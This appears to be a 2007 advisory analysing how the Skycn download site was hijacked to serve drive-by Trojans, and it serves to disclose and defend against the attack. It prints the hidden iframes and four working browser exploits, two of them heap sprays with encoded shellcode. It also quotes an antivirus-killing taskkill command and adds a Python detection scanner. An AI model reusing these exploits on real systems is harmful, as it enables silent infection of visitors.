Sky Software Station (skycn) hijacked to serve a drive-by Trojan, with Monyer's analysis - vulnerability warning - 黑吧安全网

ID MYHACK58:62200717160
Type myhack58
Reporter Anonymous (佚名)
Modified 2007-10-07T00:00:00


Sky Software Station is one of the largest software download sites, and it is now serving a drive-by Trojan, so presumably thousands of people have already been infected. Monyer is not being alarmist; the analysis below will show this is no joke.

Today I happened to visit Skycn to look up my UDisk tool (important reminder: the copy on Skycn carries a virus, do not open it!) and found that Maxthon popped up a warning that a program was about to run: the file c.exe under the C drive. I don't know what other people make of such a situation, but on my machine it was alarming. Task Manager showed memory use up by several megabytes, clearly an overflow being exploited. The root of the C drive then held a c.exe file (at this point the virus file had not yet run; had it run, there would be nothing to see). So I set off to track down the page hosting the Trojan.


Analysis of the Skycn site showed that the hijacked content exists only in the software download page. After ruling out the page's own javascript and iframes one by one, the inserted malicious code turned out to be:

<iframe name=import_frame width=1 height=1 src=http://iplog.skycn.com/wherefrom.php?id=32336 frameborder=no></iframe>

The frame's width and height are set to 1 pixel, so it is invisible to the naked eye. Downloading the wherefrom.php file reveals another piece of code inside it:

<iframe src=http://www.ip17173.cn/index.html?419891509 width=100 height=0></iframe>

Yet another frame. Visiting it directly shows two hit counters, which is rather interesting.


Next, download and open the index.html file on the ip17173.cn site: inside is a pile of obfuscated javascript. That is actually a good sign; thieves usually cover their faces when stealing.


A quick look: although the js is obfuscated beyond recognition, fortunately the decoding function is shipped with it, so everything becomes simple. Change the document.write into an alert and run index.html; the second alert window that pops up is the Trojan loader.


It contains 9 iframes, which should correspond to 9 different Trojans. Downloading them all with FlashGet, it turned out that only vip1.htm through vip4.htm are live; the rest are presumably reserved for later.

Analyzing the code of these four pages brought out a cold sweat. The results of the analysis follow.

[1] MS06-014: down.exe saved as c:\1.exe

<script>url2="";url1="";try{var ado=(document.createElement("object"));ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var xml=ado.CreateObject("Microsoft.XML"+"HTTP","");var as=ado.createobject("Adodb.Stream","");xml.Open("GET",url1,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);path1="..//ntuser.js";as.savetofile(path1,2);as.close();xml.Open("GET",url2,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);path2="C:\\1.exe";as.savetofile(path2,2);as.close();var shell=ado.createobject("Shell.Application","");shell.shellExecute(path1,"","","open",0);}catch(e){};</script><body>check no this page<html>

[2] PPStream: down.exe saved as c:\c.exe

<html><body><object id="pingfan" classid="clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458"></object><script>var shellcode = unescape("%u00E8%u0000%u6A00%uEB03%u7E21%uE2D8%u9873%u8AFE%u8E0E%u0E4E%u55EC%u4C52%u4F4D%u004E%u3600%u2F1A%u6370%u5C3A%u2E63%u7865%u0065%u5F59%u67AF%uA164%u0030%u408B%u8B0C%u1C70%u8BAD%u0868%u8B51%u3C75%u748B%u782E%uF503%u8B56%u2076%uF503%uC933%u4149%u03AD%u33C5%u0FDB%u10BE%uF238%u0874%uCBC1%u030D%u40DA%uF1EB%u1F3B%uE775%u8B5E%u245E%uDD03%u8B66%u4B0C%u5E8B%u031C%u8BDD%u8B04%uC503%u59AB%uBCE2%u0F8B%uF980%u7463%u570A%uD0FF%uAF95%u6AAF%uEB01%u52AC%u5752%u8F8D%u10DB%u0040%uE981%u104E%u0040%u5251%uD0FF%u016A%uFF57%uEC57%u57FF%u90E8%u7468%u7074%u2F3A%u772F%u7777%u692E%u3170%u3137%u3337%u632E%u2F6E%u6F64%u6E77%u652E%u6578");bigblock = unescape("%u9090");headersize = 20;slackspace = headersize + shellcode.length;while ( bigblock.length < slackspace ) bigblock += bigblock;fillblock = bigblock.substring(0, slackspace);block = bigblock.substring(0, bigblock.length - slackspace);while(block.length + slackspace < 0x40000) block = block + block + fillblock;memory = new Array ();;;; memory;for (x=0; x< 400; x++) memory[x] = block + shellcode;var buffer = '\x0a';while (buffer.length < 500) buffer += '\x0a\x0a\x0a\x0a';pingfan.Logo = buffer;</script></body></html>

[3] Storm: down.exe saved as c:\u.exe

<html> <object classid="clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB" id='target'></object> <body> <SCRIPT language="javascript"> var shellcode = unescape("%u9090%u9090%uEFE9%u0000%u5A00%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uD88B%u738B%u8B3C%u1E74%u0378%u8BF3%u207E%uFB03%u4E8B%u3314%u56ED%u5157%u3F8B%uFB03%uF28B%u0E6A%uF359%u74A6%u5908%u835F%u04C7%uE245%u59E9%u5E5F%uCD8B%u468B%u0324%uD1C3%u03E1%u33C1%u66C9%u088B%u468B%u031C%uC1C3%u02E1%uC103%u008B%uC303%uFA8B%uF78B%uC683%u8B0E%u6AD0%u5904%u6AE8%u0000%u8300%u0DC6%u5652%u57FF%u5AFC%uD88B%u016A%uE859%u0057%u0000%uC683%u5613%u8046%u803E%uFA75%u3680%u5E80%uEC83%u8B40%uC7DC%u6303%u646D%u4320%u4343%u6643%u03C7%u632F%u4343%u03C6%u4320%u206A%uFF53%uEC57%u04C7%u5C03%u2E61%uC765%u0344%u7804%u0065%u3300%u50C0%u5350%u5056%u57FF%u8BFC%u6ADC%u5300%u57FF%u68F0%u2451%u0040%uFF58%u33D0%uACC0%uC085%uF975%u5251%u5356%uD2FF%u595A%uE2AB%u33EE%uC3C0%u0CE8%uFFFF%u47FF%u7465%u7250%u636F%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574%u446D%u7269%u6365%u6F74%u7972%u0041%u6957%u456E%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4C00%u616F%u4C64%u6269%u6172%u7972%u0041%u7275%u6D6C%u6E6F%u5500%u4C52%u6F44%u6E77%u6F6C%u6461%u6F54%u6946%u656C%u0041%u7468%u7074%u2F3A%u772F%u7777%u692E%u3170%u3137%u3337%u632E%u2F6E%u6F64%u6E77%u652E%u6578"); </script> <SCRIPT language="javascript"> var bigblock = unescape("%u9090%u9090"); var headersize = 20; var slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace < 0x40000) block = block+block+fillblock; memory = new Array(); for (x=0; x<300; x++) memory[x] = block + shellcode; var buffer = ""; while (buffer.length < 4057) buffer+='\x0a\x0a\x0a\x0a'; buffer+='\x0a'; buffer+='\x0a'; buffer+='\x0a'; buffer+='\x0a\x0a\x0a\x0a'; buffer+='\x0a\x0a\x0a\x0a'; target.rawParse(buffer); </script> </body> </html>

[4] BaiduBar: calc.cab saved as down.exe

<script> function DowndloadCalcAndRun() { com.DloadDS("", "down.exe the", 0 0); } </script> </head> <OBJECT ID = "com" CLASSID = "CLSID:{A7F05EE4-0426-454F-8013-C41E3596E9E9}"> </OBJECT> <script> DowndloadCalcAndRun() </script> <body>welcome<html>

Four overflow vulnerabilities, and only a few days ago three of them were still 0days!

One is the MS06-014 vulnerability: the site's down.exe file is saved to c:\1.exe and run.

One is the PPStream stack overflow: the same file is saved to c:\c.exe and run.

One is the Storm overflow vulnerability: the file is saved to c:\u.exe and run.

One is the BaiduBar overflow vulnerability: calc.cab is saved as down.exe and run.

After running, the file deletes itself, then shuts down the antivirus software and automatically downloads further Trojans or viruses.

Of these, PPStream still has no official patch as of now.
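As an added example (not part of Monyer's writeup or any of the sites' code), a small Python scanner that checks a saved page for the indicators seen in this chain: 1-pixel or zero-height iframes like the one injected on Skycn, the four vulnerable ActiveX CLSIDs, the %u9090 heap-spray pattern, and Adodb.Stream download-and-execute. The sample pages and the human-readable CLSID labels are constructed for this example.

```python
import re

# CLSIDs of the four ActiveX controls abused by vip1.htm..vip4.htm (values from
# the analysed pages; the labels are this example's own).
KNOWN_CLSIDS = {
    "BD96C556-65A3-11D0-983A-00C04FC29E36": "RDS.DataSpace (MS06-014)",
    "5EC7C511-CD0F-42E6-830C-1BD9882F3458": "PPStream control",
    "6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB": "Storm control",
    "A7F05EE4-0426-454F-8013-C41E3596E9E9": "BaiduBar control",
}
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"(\w+)\s*=\s*[\"']?([^\s\"'>]+)")
CLSID_RE = re.compile(r"clsid:\{?([0-9A-F-]{36})\}?", re.I)
SPRAY_RE = re.compile(r"unescape\(\s*[\"']%u9090", re.I)
DROP_RE = re.compile(r"adodb\.\s*stream|savetofile|shellexecute", re.I)

def _px(value):
    """Parse a width/height attribute; None if it is not a number."""
    try:
        return int(value.rstrip("px"))
    except ValueError:
        return None

def scan_html(html):
    """Return (rule, detail) findings for one HTML page, in document order."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}
        w, h = _px(attrs.get("width", "")), _px(attrs.get("height", ""))
        # 1x1 or zero-height frames are invisible, exactly how the Skycn iframe hid
        if (w is not None and w <= 1) or (h is not None and h <= 1):
            findings.append(("hidden_iframe", attrs.get("src", "")))
    for clsid in CLSID_RE.findall(html):
        if clsid.upper() in KNOWN_CLSIDS:
            findings.append(("vulnerable_activex", KNOWN_CLSIDS[clsid.upper()]))
    if SPRAY_RE.search(html) and re.search(r"memory\s*\[\s*x\s*\]", html):
        findings.append(("heap_spray", "%u9090 NOP blocks sprayed into an array"))
    if DROP_RE.search(html):
        findings.append(("download_and_execute", "Adodb.Stream / SaveToFile / ShellExecute"))
    return findings

# Constructed samples: the injected Skycn iframe as found on the page, a
# minimal stand-in for the PPStream page (no shellcode), and a clean page.
INJECTED_PAGE = ('<html><body><iframe name=import_frame width=1 height=1 '
                 'src=http://iplog.skycn.com/wherefrom.php?id=32336 frameborder=no></iframe></body></html>')
EXPLOIT_PAGE = ('<object classid="clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458"></object>'
                '<script>bigblock = unescape("%u9090"); for (x=0; x<400; x++) memory[x] = block;</script>')
CLEAN_PAGE = '<html><iframe src="http://www.skycn.com/help.html" width=300 height=200></iframe></html>'
```

Running scan_html over each downloaded page of the chain reproduces the findings above; a page that trips both the hidden-iframe and vulnerable-activex rules is worth pulling from the site immediately.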

The name down.exe alone tells you it is a downloader. Downloading it and uploading it to virscan.org brought on yet another cold sweat:

AVG, Kaspersky, the three domestic pillars Jiangmin, Rising and Kingsoft, Norton, Trend Micro: all green lights. Even Panda, which did report a suspicious file, did so only because of the FSG 2.0 packer, which means it would not actively remove it. McAfee gave it a PWS verdict but rated it only low risk. So almost every common antivirus product on the market "struck out".

down.exe downloads 21 files, 1.exe through 20.exe and down.exe, all saved to C:\Program Files\Internet Explorer\. 1.exe through 20.exe and down.exe are then run, and it also executes cmd /c taskkill /im 360safe.exe /f and cmd /c date 2000-01-01.

Then there is a batch file that deletes the dropper itself.

There are other tricks too, such as adding startup items and renaming files.

Thanks to Ghost boy for providing this information!

The 16 virus files downloaded in the second stage are listed below (also worth noting: Antivir, the "red umbrella", already detects down.exe and all 16 viruses, and it is free antivirus that can be used alongside the antivirus already on the system):

File     Detection                              Packer                                                   MD5
1.exe    TR/Dropper.Gen                         UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo       D92BF450DA49DB121009F94E1321EDF4
2.exe    TR/Dropper.Gen                         UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo       E6D8CCC8AD8BBEB18652D432BF4A13BA
3.exe    TR/Dropper.Gen                         UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo       362D6904DE8D8111E1BD20BA5320E7FA
4.exe    TR/Dropper.Gen                         UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo       23DF9595AA8F10EB8AC850A5ACFAB791
6.exe    TR/Dropper.Gen                         UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo       FEACB467E170BAD60ECB209106402228
7.exe    Win32.PSWTroj.OnLineGames.dz.163840    nSPack 2.1 - 2.5 -> North Star/Liu Xing Ping [Overlay]   7BD941FA726E9CFB30A68F7768080B04
8.exe    TR/Dropper.Gen                         UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo       BD618C1C29BC1C7CB69AEA2BA49D7C45
9.exe    suspicious file                        Upack 0.3.9 beta2s -> Dwing                              6DC4A1336F4B0557EAFE3E3247F3C6FD
10.exe   TR/Dropper.Gen                         Microsoft Visual C++ v6.0 DLL *                          50DF0549331035B6159DD7F2BD3947A6
11.exe   TR/Dropper.Gen                         UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo       A33527DAE1C4C541609D4FECFF63A0C9
13.exe   TR/Dropper.Gen                         UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo       39CC71D365556C92EEF065169ED75148
15.exe   suspicious file                        Upack 0.3.9 beta2s -> Dwing [Overlay]                    1E96067D3C6A25BFF59AD76C03C2A565
16.exe   suspicious file                        Upack 0.3.9 beta2s -> Dwing                              73E0B9D28014C84675BEF3343409EDB2
17.exe   Win32.PSWTroj.OnLineGames.dz.163840    nSPack 2.1 - 2.5 -> North Star/Liu Xing Ping [Overlay]   477927E9679924CEFCF8BD95DF2BA71D
18.exe   Win32.PSWTroj.OnLineGames.dz.163840    nSPack 2.1 - 2.5 -> North Star/Liu Xing Ping [Overlay]   A2C87EE4059B2145DCA8CC7CF9692329

5.exe, 12.exe, 14.exe, 19.exe and 20.exe could not be downloaded.

For the four overflows above, Monyer's fix is as follows:

Download the patch for the MS06-014 vulnerability, and upgrade BaiduBar and Storm.

PPStream is more troublesome: delete the registry CLSIDs {20C2C286-BDE8-441B-B73D-AFA22D914DA5} and {5EC7C511-CD0F-42E6-830C-1BD9882F3458} until an official fix is provided.

As for Skycn and the other official sites, wait until they have published a bulletin before going back; walk by the river often enough and your shoes get wet! A site this big does not get broken into every day either!

Finally, a look at the Trojan's related files: quite a spectacle.


Monyer! 2007-10-04 02:35